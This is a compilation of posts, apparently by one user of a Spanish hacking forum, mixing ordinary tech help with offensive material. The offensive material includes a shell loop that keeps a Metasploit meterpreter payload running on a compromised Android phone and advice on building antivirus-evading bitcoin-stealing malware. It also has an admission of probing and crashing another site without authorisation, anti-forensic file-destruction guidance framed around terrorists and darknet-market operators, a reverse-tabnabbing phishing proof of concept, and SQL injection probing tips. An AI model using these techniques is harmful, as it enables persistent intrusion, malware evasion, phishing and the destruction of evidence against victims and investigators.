Buenas tardes You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como sabemos, la migración de procesos no funciona de igual forma en Android que en Windows. Por tanto, estoy suponiendo que ya tienes una session meterpreter con el objetivo y por tanto, deberás crear un .sh para posteriormente subirlo al teléfono Android y que se esté ejecutando de manera constante:

Script 'popular' usado para ello:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Donde deberías poner el paquete y la activity del .apk que tienes(AndroidManifest.xml).

Un saludo.

Entonces intenta con .NET Reflector y nos cuentas.

Buenas tardes You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como te mencionó @Gold Master, habría que decompilarlo. Sin embargo, no es tan sencillo como lo parece. Actualmente, las empresas se están cuidando de éste tipo de técnicas que usan para crackear sus programas y para ello implementan "Packers". Sin embargo, podrías identificar qué packer(si lo posee) tiene el software objetivo y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login te cae como anillo al dedo.

¿Sabes en qué lenguaje lo han desarrollado?. Si es en Java o si es en .NET, se puede hacer la descompilación que algo desarrollado en C/C++.
Si nos detallaras más de lo que quieres descompilar, te podríamos dar una respuesta con más precisión.

Los descompiladores más usados son:

- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Y quizás, te puede servir el debugger de OllyDbg para el respectivo análisis del código binario.
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo.

Buenas tardes You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Cuando se realizan ese tipo de investigaciones, se debe leer de manera considerable los artículos científicos(no menor de 3 años que han sido publicados). El fin de esto, es porque deberás referenciar casi que cada afirmación que hagas en el documento de tu tesis, y esto sólo se consigue de esa forma. Para ello, puedes ver documentos de IEEE Xplore por ejemplo, la cual es una de las bibliotecas top a nivel mundial.

Además de ello, ¿ya hiciste un estado del arte?. Probablemente, no eres al primero que se le ocurre esa idea y deberás verificar qué documentos ya existen y que tu investigación no sea en vano.

Te dejo unos artículos actualizados que te pueden servir. Recuerda sus investigaciones varian pero incluso llegan hasta protección de kernel drivers en el mismo.

Para descargar, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El tar.gz contiene:

- "High-coverage Security Testing for Windows Kernel Drivers".
- "Windows Virtualization Architecture For Cyber Threats Detection".
- "Detecting Security Vulnerabilities in Remote TCP/IP Networks: An
Approach Using Security Scanners".

Como última apreciación, deberías acotar tu investigación por motivos de tiempo.

Un saludo.

Buenas tardes You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Estoy de acuerdo con @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, ya que la pregunta no se encuentra muy bien formulada. Cuando te refieres a: 'q no fuera capaz espiar mi pc', ¿te refieres al mismo S.O de Windows? ¿te refieres a la NSA? ¿te refieres a alguien que te realice un MitM? ¿te refieres cuando navegas por la web?. De todas formas, en el foro encuentras muchas guías de ello:

- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como te mencioné anteriormente, puedes revisar el foro que hay diversa información del tema de privacidad y/o 'anonimato'.

Un saludo.

Intentar vulnerar la aplicación sin autorización es ilegal y además, nadie de los que está en el foro lo hará por recuperar algo de un usuario. En la parte de 'Olvidé mi contraseña' puedes poner tu nickname y te llegará un mail a tu correo electrónico(revisa a los que tienes acceso) e intenta conocer cuál está asociado a tu cuenta.


Un saludo.

Buenos días You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Quería colaborarte y por ello, me registré en el sitio pero al parecer, ocasioné un error en el sitio y actualmente, está 'off' el mismo xd. Aparte de encontrar XSS y otras vulnerabilidades de severidad crítica, me frenó el loop que ocasioné sin querer.

Ahora bien, pretendía encontrar tus datos de contacto pero lo mejor será que les comentes de una manera clara y concisa al soporte.


Error que generé y dejó el sitio off(por error lógico):


Si tienes acceso a todas las direcciones de correo electrónicos que has tenido, será de gran ayuda, puesto que puedes simplemente generar un enlace de 'olvidé mi contraseña'. ¿Puedes confirmarnos si tienes acceso a todas tus direcciones correos electrónicos?. 

Un saludo.

Buenas noches You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sin duda, es muy apasionante el mundo que trata sobre malware y más aún, cuando se trata el tema de bitcoins. Si deseas realizar malware's de ese tipo, debes tener bien fundamentadas las bases de programación, precisamente, porque tendrás que realizar evasiones de las heurísticas de los antivirus, hacer usos de espacios de memoria y entre otras cosas que son muy importantes para que el malware pase inadvertido. Ahora bien, puedes crear ese tipo de malware's en C++, Python, AutoIT(probablemente, no estoy muy seguro) e incluso, en .NET o Assembler. El malware que mencionas, al parecer ha sido creado en .NET y es una variante de uno denominado You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Indagando un poco, encontré un You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login del posible autor que distribuye y/o comercializa éste malware(Evrial) en la Deep Web y en otros sitios. Puedes hacer demostraciones o pruebas con plataformas de trading donde se incorpore lo que necesitas y para ello puedes usar plataformas de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. PaperMoney no es más que un market simulator de trading. Te servirá de algo.

Para finalizar, en Underc0de, hay mucha información acerca de Malwares, creo que te servirá de mucho.

Un saludo.

Nota:nótese las negrillas con las URL's para que vayas directamente a la información.

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para dar una respuesta un poco más precisa, ¿podrías darnos el modelo por favor?.

Un saludo.

Perfecto You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login te agradecería si pones resuelto el tema .

Por otra parte, ¡esperamos tus aportes!. Un saludo.

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Intenta editar /etc/NetworkManager/NetworkManager.conf y a continuación, añadir lo siguiente:

[connection]
wifi.cloned-mac-address=random

No es necesario incluso que la cambies, ya que cuando se levante el servicio, éste, se encargará de cambiarte la MAC. Inténtanlo y nos cuentas.

Un saludo

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Por favor, ve a la carpeta de tu proyecto y busca la carpeta "gradle". En esta carpeta, existe un archivo denominado "gradle-wrapper.properties", ábrelo con un editor de texto y cambia la versión de distributionUrl por la que te está pidiendo el Android Studio.

¿A qué te refieres con "portar" un proyecto en una API más reciente?.

Un saludo.

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Si quieres armar algo así, no podrías usar el Minimax, por la naturaleza estocástica del juego. Sin embargo, no sé si alguna vez escuchaste de Expectimax, la cual es una variante y se desarrolló especificamente para estos casos. Sé que Expectimax te servirá, pero debes indagar en cómo implementarlo en tu algoritmo.

Puedes ver proyectos en GitHub de este, aquí: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Un saludo.

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Respondiendo a una de tus preguntas: no, no cambia en el sentido de manejo de la distribución el hecho de que instales las herramientas que necesitas en tu distribución de Ubuntu. Sin embargo, si cambia mucho el hecho de tu "seguridad".

De hecho, por ponerte un ejemplo, yo uso Arch Linux y lo que hice fue importarle las herramientas que requiero.

Como te comentaron los anteriores usuarios, esas opciones son muy usadas(sobretodo la de Katoolin).

Buenas tardes You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Si el disco tiene algunos sectores dañados, estaría bueno si se supiera si es un un sector lógico o físico del HDD. Además de esto, ¿se fijaron si tienen tamaño los archivos recuperados?. Es muy importante que determinen si con TODOS los archivos pasa lo mismo.

Otra de las cosas importantes para dar una solución más certera, es saber con qué software te están recuperando la información.

Existe un Software llamado EaseUS Data Recovery, intenta coan ese y cuéntanos.

Un saludo.

Interesante investigación HATI, aunque me sigue llamando la atención de la manera en la que operan éste tipo de grupos. Recuerdo haber leído una noticia que los cibercriminales recolectaban la información de los wordlist de  sitios como: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (existen más, claro) y les hacían ingeniería social a las víctimas.

Antes que nada, gracias You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Con respecto a tu pregunta, no es mi fuerte ésta rama, pero sí te podría recomendar que uses programas enfocados a ello: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para ver si sí funciona. No sé realmente si éstos funcionen y/o apliquen cuando un HDD está dañado, pero he leído a varias personas que sí(y debería, pues sino imagínate a un forense diciendo que no se pudo en un escenario de un miembro del IS*S).

Un saludo.

El día de hoy, quiero aportar algo de lo que conozco en lo que respecta a la destrucción de datos. Como Pentesters, hay que saber de todo un poco, a pesar de especializarte en los temas que más te apasionan.

En éste caso enfatizaré más en los HDD.

La restauración y/o la destrucción de datos probablemente son dos caras de la misma moneda. ¿Deseas saber cómo y cuándo recuperar información? entonces deberás comprender cómo puede destruirse irrevocablemente. Se suele vender la idea de que el borrado de archivos es sencillo, sin embargo, es muchísimo más complejo de lo que parece.

Dependiendo del grado o del nivel de cuán importantes son los archivos  que desees borrar, debes aplicar distintas técnicas. Te planteo tres ejemplos que SE DIFERENCIAN ENTRE SÍ:

• Si deseas borrar unas fotos donde sales desnudo.
• Si eres un integrante del IS*S.
• Si eres uno de los administradores de DarkMarkets (P.E SkillRoad).

Como podrás notar, los ejemplos anteriores se asemejan en que se necesitan borrar los archivos pero distan en su contexto. No es lo mismo que desees borrar imágenes de tu galería donde sales desnudo que borrar una galería entera de personas decapitadas. De este modo, si un integrante del IS*S o un administrador de una DarkMarket elimina los archivos con Shred, Wipe, AxCrypt, Ccleaner y/o cualquier otro método convencional, el archivo casi siempre puede ser recuperado en su totalidad.

Para los que no sepan, en un laboratorio se pueden recuperar hasta +70 capas de borrado. Si tengo un archivo denominado: Underc0de.txt y luego creé otro y lo borré por 70 veces, en un laboratorio no tengas duda que será recuperado. ¿Cómo lo hacen? uno de los instrumentos que son usados en éstos laboratorios son los osciloscopios(básicamente es un dispositivo de visualización gráfica que muestra señales eléctricas variables en el tiempo). El proceso es medir la huella magnética de cada bit en el disco y es ahí donde se sabe si en ese bit hubo grabado un 0 o un 1, donde 1 significa que sí hubo grabado algo y 0 no. Un software que cumple con lo anterior, analiza e interpreta las huellas magnéticas y genera los 0's y 1's y lo hace por el número de veces que mencioné anteriormente.


Una recomendación que puedo hacer, es no poner en el nombre de los ficheros nombres tan certeros que indiquen de qué trata el fichero. El motivo de esto es que la mayoría de veces, se el nombre de un archivo, más no su contenido. Por ejemplo, si yo elimino un archivo denominado Passwords-All-Users-Underc0de.txt pues con los software de recuperación, ya sabría que dicho archivo es algo importante y es un .txt, los cuales son dos datos importantes para su recuperación. De hecho, hasta los metadatos suelen quedar en el disco.


UIno de los problemas principales que existen actualmente, es que los fabricantes de los discos duros(HDD) solventan los problemas de una manera "muy peculiar". Resulta, que si un disco duro está grabando un archivo y va en 98% por ejemplo y por "X" o "Y" motivo ocurre un error, algunos discos empiezan a grabar el mismo archivo en otro sector del disco y ese progreso del 98% del archivo, se queda ahí. Otro tipo de discos, lo que hacen es copian el archivo grabado a otro sector del disco para que siga con su progreso normal.  Existen herramientas que aprovechan este tipo de cosas y recuperan los archivos "incompletos".

De esta forma, muchos piensan en recurrir al método Gutmann que lo que hace es de más de 35 pasadas sobreescribe el archivo mediante patrones de ceros y unos para confundir a las herramientas usadas en los laboratorios de recuperación de información. A pesar de que es uno de los más utilizados, puedes recurrir por uno de los que se dice que usa el Departamento de Defensa de EE.UU: U.S. DoD 5220.22-M (ECE). Pueden encontrar un poco más de información You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Entonces si realmente es algo que debes borrar, entonces lo que yo haría es encriptar el/los ficheros. Esto por el simple hecho de que es más complicado desencriptar que recuperar los ficheros/datos borrados. Por último, si deseas seguir un estilo de recomendaciones, lo que yo te compartir es:

- Cambia el nombre y extension del archivo -> Encripta el archivo con una contraseña que confirmes que es compleja de descifrar -> Aplica el método de Gutmann al/los ficheros -> Realiza las limpiezas y/o desfragmentaciones del disco con software como Ccleaner, Advanced SystemCare y los demás que abundan en internet.

Aunque son unas pequeñas recomendaciones, entiendo que habrán unas recomendaciones adicionales que le haga un poco más difícil el volcado de archivos a los forenses, pero insisto, depende de lo importante que sea el fichero.




Probablemente, no me hayan visto últimamente, pero fue porque estuve en una experiencia de desarrollador en una empresa y aunque fue una experiencia muy bonita, ya retomaré nuevamente todo.

Espero que les haya servido. Cualquier aporte es bienvenido.

Un saludo.

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Mira que antes, yo practicaba mucho en sitios como:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Son sitios donde ponen retos que muchas veces suceden en la vida real y que de seguro, te servirán mucho. De hecho, hay unos que te permiten hacer un estilo de "versus" contra otro programador/desarrollador para ver quién termina de la forma más rápida el reto.

Un saludo.

Basándonos con ésta premisa, podemos entonces deducir que, la mayoría de las casas de desarrollo, se enfocan en sacar sistemas escalables, flexibles y pensados a futuro, cumpliendo netamente con la ideología de alta cohesión y bajo acoplamiento.


¿Eres desarrollador/a?

Si eres desarrollador, deberías hacerte las siguientes preguntas básicas antes de proseguir a lo técnico:

• ¿Cuál es la metodología que usas para realizarle auditoria a tu aplicación?. -> Owasp | ¿Por qué Owasp?.
  
  Owasp no siempre es el indicado para realizar pentesting a tus aplicaciones web. La metodología muestra un top el cual puede resultar no ser el adecuado para lo que estás usando. Por ejemplo, si usas Rails, las You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login son un problema, y esta, no aparece en el Owasp Top(2013 & 2017).Te puedo nombrar otro ejemplo y es el de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  Aclaro que su última actualización fue ya hace algunos años, pero si nos centramos con ésta lógica, en el Top 10 de Owasp 2016 va liderando la inyección SQL y ésta apareció hace más de 20 años(1998, para ser más precisos).
• ¿Te confías de tu Framework?
  Grave error. De los desarrolladores que conozco, el 99% de ellos se confían en las funciones que sanitizan las entradas de su aplicación. Por ejemplo,  ¿Sabes que se han descubierto fallos en las mismas funciones, cierto?. No digo que las funciones no deberían tener fallos, pero los desarrolladores deberían además de aplicar dichas funciones, aplicar más filtros para controlar cualquier entrada maliciosa por parte del usuario.
  
• ¿Qué versión de DBMS usas?
  En ocasiones, los DBMS(DataBase Management System) no se actualizan porque la aplicación genera errores al realizar las consultas por la versión de ésta. Es un gran problema, pues hemos visto que hay versiones de Mysql por ejemplo, donde en versiones anteriores, se puede realizar escalación de privilegios, lo mismo que en Oracle, MariaDB, entre otros.
  

Es difícil, realmente difícil protegerse ante cualquier amenaza, porque el precedente es y será el riesgo de los activos con los que contemos. Pero si de algo estoy seguro, es que nosotros como Pentesters, debemos desarrollar el ojo clínico para lo que hacemos. Cada cosa afecta al sistema que queremos romper, es el entorno que se convertirá en nuestro habitat y una vez lo conozcamos, podremos conocer las posibles vulnerabilidades y explotarlas.

Sin más preámbulo, vamos a lo técnico y les mostraré algunas vulnerabilidades que podrán parecer de impacto bajo, pero bien explotadas, pueden afectar hasta al mismo gerente de una empresa.

REDIRECCIONES CONTROLABLES


El plugin de NoRedirect, nos permite controlar las redirecciones de sitio y tomar control a nuestro antojo. Si nosotros desearamos ingresar a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, no nos dejaría, porque siempre nos va a redireccionar a login.php. Si lo viéramos desde el código, sería algo como esto:
[/list]

<?php
if(isset($_COOKIE['id_user'])){
header('Location: index.php');
}else{
//Si la cookie no existe, entonces que siempre me lleve al login.php
header('Location: login.php');
}
    ?>

Desde ese punto de vista, lo único que haríamos es bajar el plugin para firefox, instalarlo y luego añadir el sitio del panel de administración con alguna expresion regular si lo deseamos.



ABRIR NUEVAS PESTAÑAS

La etiqueta de a href es una de las más usadas en cualquier aplicativo web. De hecho, es usada con el atributo "_blank" para abrirle una nueva pestaña al usuario y evitarle molestias a este. Un claro ejemplo, es este:

<!DOCTYPE html>
<html>
<head>
</head>
<body>
<a href="https://google.com" target="_blank">Google</a>
</body>
</html>

Si presionamos en el hipervinculo, nos llevará a Google, claro está. El problema es que la mayoría de páginas web implementan opciones como: "el usuario podrá crear un link de su biografia y poner un sitio web o incluso, comentar con un link de su sitio web". Generalmente(si lo vemos desde el lado de los Frameworks), validan desde el Controlador que el link debe ir de una forma en particular. Si un atacante logra observar que puede crear un link del siguiente estilo, podrá redireccionar sin que se de cuenta al usuario a una página para realizar phishing:

<a target="_blank" href="http://viinacademy.com/PoCUnderc0de/index.html"> Mi sitio! </a>

Y se vería de la siguiente forma:


Donde el link del atacante(el que está en el atributo de href) contiene lo siguiente:

<html>
<script>
if (window.opener) window.opener.parent.location.replace('https://underc0de.org/foro');
if (window.parent != window) window.parent.location.replace('https://underc0de.org/foro');
</script>

The rules of life:

</html>

Ahora, si un usuario da click y tiene muchas pestañas abiertas(la mayoría de las personas siempre las tienen), le va a abrir una nueva pestaña que abrirá el link de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y le mostrará "The rules of life" pero a la página original(la de localhost/Test/index.html) la redireccionará a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Esa redirección, bien podría ser un scam o una página maliciosa, dependiendo de la creatividad del atacante.

Resumiendo esta técnica, parándonos como atacantes, serían los siguientes pasos:

• Ingresar a la página de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
• Ingresar a alguna vista que nos permita crear un link.
• Verificar que permitan usar el atributo de target='blank_'".
• Crear un scam(página idéntica al sitio legítimo) de la página y tenerlo hospedado en un servidor.
• Poner en un link la página junto a un texto que sea interesante.

¿Cómo es posible solucionarlo?

Siempre deberás usar rel="noopener noreferrer" cuando uses el atributo target="_blank". Esto no permitirá redirigir a los usuarios.

INYECCIONES SQL

Qué más que las más conocidas como inyecciones SQL. Daré algunos tips desde el lado del pentester para descubrir inyecciones en lugares donde no se cree que las aplicaciones las tienen. Al ser una de las vulnerabilidades más explotadas, creo que los desarrolladores deben enfocarse en el BUEN filtro de sus campos.

• Intentar poner la comilla(') probablemente es una de las primeras opciones que intentamos al realizar pentest en una aplicación. Sin embargo, esto puede provocar distintos filtros y una redirección a distintas páginas de error para encubrir la SQLi. Debes intentar generar errores, bien sea, basadas en error y/o en unión, siempre pensando en cómo respondería el DBMS.
• ¿Qué pasa si comentas alguna sentencia? por ejemplo: %23' o --', pues como sabrán, así se hacen los comentarios cuando hacemos procedimientos almacenados pero al realizar pentest en una aplicación, esto puede generar errores(porque se le ordena que ignore lo que sigue de la consulta al recibir el parámetro).
• A veces, los desarrolladores pasan funciones como addslashes,htmlspecialchars, entre otras, con el fin de sanitizar las entradas. Sin embargo, la documentación de PHP NO recomiendo usar éste tipo de funciones, pues aparte de estar obsoletas, se ha demostrado que son obsoletas realizando inyecciones de charsets. En especiales, estas funciones filtran la comilla simple y/o dobles("/'), pero podrás intentar poniendo comparaciones de variables que no serán válidos, como @@verxi0n(@@version), @@Slep(@sleep), entre otr@s.
• Si la entrada es un número, puedes intentar hacer operaciones aritméticas y de ahí, intentar con otros vectores de ataque.
  Por ejemplo, puedes hacer cosas como id=365--' o id=1-2.

Algunas de éstas vulnerabilidades me han servido para estar en el HoF(Hall Of Fame) de algunas empresas y créanme, los desarrolladores generalmente cometen las mismas fallas debido al uso de metodologías ágiles, de tiempo o de cualquier otro factor que pueda afectar su rendimiento vs cumplimiento.

Cualquier duda,opinión y/o sugerencia, será bien recibida.

Un saludo.